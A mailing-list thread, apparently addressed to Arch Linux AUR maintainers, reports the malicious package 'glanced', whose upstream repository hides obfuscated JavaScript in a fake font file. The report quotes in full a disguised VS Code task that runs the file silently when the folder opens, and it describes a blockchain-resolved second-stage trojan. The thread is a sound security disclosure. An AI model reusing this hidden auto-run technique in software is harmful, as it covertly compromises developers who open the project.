On Sat, 12 Sept 2026 at 23:38, Nicolas Boichat <[email protected]> wrote:
>
> Hi,
>
> Thanks Saren,
>
> The maintainer should probably be banned from AUR as well.
>
> https://aur.archlinux.org/packages/tokentracker-cli =>
> https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4f

Slight correction, the PKGBUILD points at
https://github.com/ayan-de/Token-Tracker/tree/v0.1.13, which doesn't
contain the strange commit.

I'll let you figure out what's the proper action here.

> The 2 other packages I'm not sure, didn't check the binaries.
>
> Thanks,
>
> On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote:
> >
> > Package: https://aur.archlinux.org/packages/glanced
> >
> > Upstream: https://github.com/ayan-de/glance-linux
> >
> > https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2
> > is obfuscated javascript disguised as a .woff2 font file, with a lot of
> > whitespace prepended. This javascript will be executed when this package
> > is opened using vscode as defined in .vscode/tasks.json
> >
> > ```json
> > {
> >    "label": "eslint-check",
> >    "type": "shell",
> >    "command": "(command -v node >/dev/null 2>&1 && node
> > ./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node
> > ./public/fonts/fa-solid-500.woff2) || echo ''",
> >    "isBackground": true,
> >    "hide": true,
> >    "presentation": { "reveal": "never", "echo": false, "close": true },
> >    "runOptions": { "runOn": "folderOpen" }
> > }
> > ```
> >
> > When executed, the code will resolve a specific ethereum transaction
> > from blockchain, resolving a 2nd stage payload from http, effectively a RAT.
> >
> > Detailed analysis by claude:
> > https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d
> >
> >

Reply via email to